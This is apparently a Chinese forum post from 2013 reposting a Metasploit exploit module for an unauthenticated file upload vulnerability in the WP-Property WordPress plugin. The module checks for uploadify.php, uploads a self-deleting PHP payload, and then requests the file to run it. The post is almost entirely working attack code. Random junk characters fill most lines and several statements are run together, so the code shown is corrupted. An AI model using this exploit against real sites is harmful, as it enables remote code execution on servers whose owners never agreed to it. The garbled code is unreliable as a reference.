WordPress WP-Property PHP 文件上传漏洞" L/ Z, K+ x. q I* K* b: _8 o* Z9 Z
9 k* E7 t0 i3 ]$ H/ i3 ^" v! j, Y
## # This file is part of the Metasploit Framework and may be subject to. L; R$ S% t. c6 g! ]$ G* n _0 C% `
2 e, A" ^6 B# V4 ?9 g
# redistribution and commercial restrictions. Please see the Metasploit
% I; z: T1 I% z+ `! P0 j6 z' ~! @& q8 p
# Framework web site for more information on licensing and terms of use.; a6 l- n+ P# d V
( c7 |# \* D- X: ?# http://metasploit.com/framework/ ##
* d% M* f5 j$ I- A' c5 A( I; U; ?5 l) m A0 i5 `" b
: \) S* E. K) h6 X
0 b# g, V5 F. E' ], J& I k 0 n, o! W2 Q- y6 b9 g, b; e
! |; ?$ t/ Q R0 z) mrequire 'msf/core'" e+ B7 K6 O$ f
require 'msf/core/exploit/php_exe'* O6 r$ [9 i" V8 I [0 g
/ T4 B7 q* u7 V! @4 _- L l
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
9 ?0 X5 u9 R8 L'Description' => %q{# q+ M- ^9 [, H: W5 j. o
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>, P* `. d! R" h5 E+ Y+ \ N, o
[. p6 f6 a( `! j: u) c) b2 R) g% t9 a
'Sammy FORGIT', # initial discovery
: f, g) F! a. H) n* A5 t: q5 {+ F'James Fitts <fitts.james[at]gmail.com>' # metasploit module
4 N" }* W- b4 h' [, X9 J],
. b. O' _! D8 i* b; b* Q1 Y8 a+ d'License' => MSF_LICENSE,
; w5 M7 z: Q: ?9 }7 _2 y4 d& H$ c$ Y, c'References' =>
! I' x5 x9 ]; G/ S% L, F# F# U[# w( s! O8 G. L" C
[ 'OSVDB', '82656' ],
) \5 A5 [1 ^+ N' {5 T[ 'BID', '53787' ],
; Y- h9 W3 K* w[ 'EDB', '18987'],
4 M% C* x3 r4 h# @ U[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
2 @7 |" ?, y0 D3 R9 }% g],& a( |+ `' ?! Q; w u) z c- U( l0 r R4 Q
'Payload' =>
% o. O* O6 o$ m% Z! `{
( v5 i* |3 f" q x j6 i'BadChars' => "\x00",# k, _# q( C" F. v4 `; b
},
& E& J5 Z/ A) V/ {) m'Platform' => 'php',4 Q+ E! D. Q+ v5 i. e7 v% [
'Arch' => ARCH_PHP,
$ C. U t, e/ f6 ?' z'Targets' =>
0 Y$ b' @: \8 u. z[
% C. H/ @( d( r- i& Z$ a' H: N3 o[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],; A0 V% p* b9 d# u1 c2 [' C
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
, v# I, \: t8 o' v, C],6 h" r3 o; ^3 T* o m A
'DefaultTarget' => 0,: `1 y$ @! f8 m" x
'DisclosureDate' => 'Mar 26 2012'))
% J- Y3 G* Z7 @8 ]% N& B
+ |4 I! T9 ^% Y' _register_options(7 [2 v& [3 G" W0 u* a$ z* k1 ^
[5 P6 o. f8 B" T! U. X
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
) {6 X* V8 o6 I* C1 }], self.class)
& s9 z0 G. Q% d- d4 Uend
! L( o$ k& Z# F; i9 I% _
5 T1 \4 j R% f8 J1 ddef check
/ O+ J: a% p, {0 k8 G1 |uri = target_uri.path
$ P& V' Q5 n: u- Zuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
* ~" r. o* ^" F3 s'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 L; ]* @9 i' r/ g! ^' u m+ q
}): ]2 x( c5 V3 M: ?
& E$ U, C: ]9 h
if not res or res.code != 200
q* t) W3 o3 r1 O( O2 F4 u6 T+ xreturn Exploit::CheckCode::Unknown
' `; S f9 a9 ~7 C8 M" D' ?8 ]4 Tend- h; B0 k% {* c- a) x( G
3 K, a& D! u Y i2 B
return Exploit::CheckCode::Appears( x, r- q: Y* Q) \# _
end* d" @& @% }- A, I; Y: Q3 }
0 r) l( {' o/ q% H( O0 Q/ G, J
def exploit
1 W" F; ]. B+ ]9 ?8 luri = target_uri.path/ R( m# x- X. l$ a8 K) T
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
; h. U& n9 n! G' ]
/ M& g/ {7 o1 j% Kdata = Rex::MIME::Message.new
: C6 F- P! k X$ s# zdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")) O% c- E8 W- ^8 m& Y
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
8 N. N8 }$ J8 R. k$ f0 z) q! a( cpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')! C- m" a2 E! _8 y* o
4 F: h! `, M4 [- Q) _3 J& L5 t
print_status("#{peer} - Uploading payload #{@payload_name}")3 S; a7 \4 a+ A2 F+ l1 l8 \
res = send_request_cgi({
3 Q: v0 O6 _) b'method' => 'POST',
9 s) r: t# j! m" x& N' n3 x'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
: t* r1 U- ~/ L5 ~# n% ^8 S'ctype' => "multipart/form-data; boundary=#{data.bound}",6 ]1 m- q ~1 f, R! Y1 w
'data' => post_data# O1 _# H. Z8 e- u- G( P
})6 ?/ [4 O, h |# S! T$ I- w9 w
- Z4 b0 \3 d& `$ Hif not res or res.code != 200 or res.body !~ /#{@payload_name}/
$ I. M0 O1 A/ h M s1 a2 \fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")2 U2 }8 M1 {2 m2 t+ x1 e2 X
end) M: a9 |3 f" H0 Y
9 E, q; }5 q3 i! y8 I# B& z
upload_uri = res.body
+ {; B }5 n O3 L+ ^& W# J/ o5 m4 g+ g6 n0 [6 d1 E
print_status("#{peer} - Executing payload #{@payload_name}")) ^- S7 b0 _; a9 n4 T
res = send_request_raw({- O& r% P4 i: t$ V# i' h
'uri' => upload_uri,6 R0 ^5 J) e) d5 j$ K
'method' => 'GET'
! B8 v& ?6 Z* [})' o% z0 T7 M) o f2 x: w& Y, Q
end
* j G2 _2 Z4 J, e: q! ]) ?end
0 [7 R6 r+ ~9 c+ r2 q i, q( m! r& q7 ~
不要问我这写的是什么 怎么利用 我是说msf.
4 n: ~! Q, W" @! ~; e e5 q' x$ \
|
发表于 2013-1-4 19:51:30
收藏
支持
反对